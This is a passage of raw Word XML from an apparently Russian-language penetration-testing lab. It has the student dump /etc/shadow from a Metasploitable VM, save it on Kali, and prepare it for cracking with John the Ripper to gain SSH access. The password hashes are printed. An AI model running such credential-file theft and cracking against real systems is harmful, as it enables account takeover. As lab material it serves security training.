          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr:127.0.0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1  Mask</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A17952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inet6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:1/128 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope:Host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41B80406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UP LOOPBACK </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RUNNING  MTU</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:16436  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F2DB9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RX packets:1048 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A0059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TX packets:1048 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC56FC" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="00D12943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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">collisions:0 txqueuelen:0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233EF6A" w14:textId="567E3BE2" w:rsidR="00166EDC" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX bytes:450261 (439.7 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KB)  TX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes:450261 (439.7 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC2FC8" w14:textId="45E58622" w:rsidR="00903082" w:rsidRPr="00D12943" w:rsidRDefault="00903082" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903082">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1157B074" wp14:editId="5F4E1C83">
            <wp:extent cx="6400800" cy="13500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C36C" w14:textId="58AFF668" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы получить полный доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальной машине Metasploitable, начните</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>вывода на экран содержимого файла</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сохраняет информацию</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t>пароле</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>зашифрованном формате для учетных записей системы,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> а </w:t>
      </w:r>
      <w:r>
        <w:t>также дополнительную информацию</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t>его устаревании.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E37305" w14:textId="7F9281CD" w:rsidR="00492030" w:rsidRPr="00492030" w:rsidRDefault="00492030" w:rsidP="00492030">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Введите команду</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> cat/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для отображения этого содержимого.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224D4E8" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00D2465E" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A08BDD8" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>root:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67E114" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>daemon:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832C5C3" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9894F" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A754968" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001F195B" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sync:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108DECFB" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>games</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC916A0" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075CFDE" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;некоторые выходные данные пропущены&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B44606" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>mysql:!:14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EF2DDE" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>tomcat55:*:14691:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF87BF" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>distccd:*:14698:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C78C04" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253694A" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB350B" w14:textId="4AB5D539" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>telnetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:14715:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242EB5D3" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001660F4" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:!:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>14727:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02166D" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00A96FBC" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>statd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:*:15474:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E2324F7" w14:textId="41CE29E0" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>analyst:$1$uvEqE7eT$x6gczc318aD6mhxOFZqXE.:17338:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098A036" w14:textId="60A3A604" w:rsidR="00B60E1B" w:rsidRDefault="00040416" w:rsidP="00B60E1B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выделите содержимое файла </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t>, щелкните правой кнопкой мыши по выделенному содержимому</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Copy (Копировать)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E00284C" w14:textId="3FB1A631" w:rsidR="00040416" w:rsidRDefault="00B40DFE" w:rsidP="00447387">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Откройте новый терминал на виртуальной машине Kali</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запустите текстовый редактор </w:t>
      </w:r>
      <w:r w:rsidR="00040416">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:t>. Введите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">командной строке: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nano /root/shadow.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408010FA" w14:textId="242E4C14" w:rsidR="00364E35" w:rsidRPr="008855F4" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano /root/shadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE5F8C" w14:textId="450EBB52" w:rsidR="00B60E1B" w:rsidRDefault="00B60E1B" w:rsidP="00B60E1B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Щелкните правой кнопкой мыши по свободному месту</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Paste (Вставить)</w:t>
      </w:r>
      <w:r>
        <w:t>. После того как вы вставите содержимое, удалите все пустые строки</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>нижней части при необходимости. Введите</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Ctl-X</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы сохранить</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выйти из </w:t>
      </w:r>
      <w:r w:rsidRPr="001319BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:t>. Нажмите клавишу</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>в ответ на запрос</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t>сохранении файла</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">примите имя файла </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shadow.txt</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C958F6E" w14:textId="146C3602" w:rsidR="00B60E1B" w:rsidRDefault="00025C56" w:rsidP="00B60E1B">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сохраненный файл </w:t>
      </w:r>
      <w:r w:rsidR="00F32D08" w:rsidRPr="001319BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/root/shadow.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> будет использоваться</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>дальнейшем</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>утилите John the Ripper для взлома паролей некоторых имен для входа,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>вы сможете войти</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>систему дистанционно по протоколу SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A7CD9C" w14:textId="4F2F8681" w:rsidR="00A52EBD" w:rsidRDefault="00A52EBD" w:rsidP="00A52EBD">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>В этом же терминале введите команду</w:t>
      </w:r>
      <w:r w:rsidR="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> cat</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>фильтром</w:t>
      </w:r>
      <w:r w:rsidR="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> grep</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы отобразить только сведения для пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26881892" w14:textId="791DAD0B" w:rsidR="00A52EBD" w:rsidRPr="001660F4" w:rsidRDefault="00A52EBD" w:rsidP="00D94868">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">@~# </w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /root/shadow.txt | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C496A4B" w14:textId="7E51ACFE" w:rsidR="00D94868" w:rsidRDefault="00D94868" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="060383B0" w14:textId="3D61CA60" w:rsidR="00D94868" w:rsidRPr="00320420" w:rsidRDefault="009F3A0B" w:rsidP="00D94868">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Обратите внимание, что каждая строка разделяется двоеточиями (:) на</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:t>полей.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>данном примере учетной записи пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">правами root </w:t>
      </w:r>
      <w:r w:rsidR="00320420">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это имя пользователя,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> а </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">зашифрованный пароль — </w:t>
      </w:r>
      <w:r w:rsidR="00320420" w:rsidRPr="00320420">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.</w:t>
      </w:r>
      <w:r>
        <w:t>. Следующие</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r>
        <w:t>полей определяют конфигурацию для пароля, например дату последнего изменения, минимальный</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>максимальный срок действия пароля</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
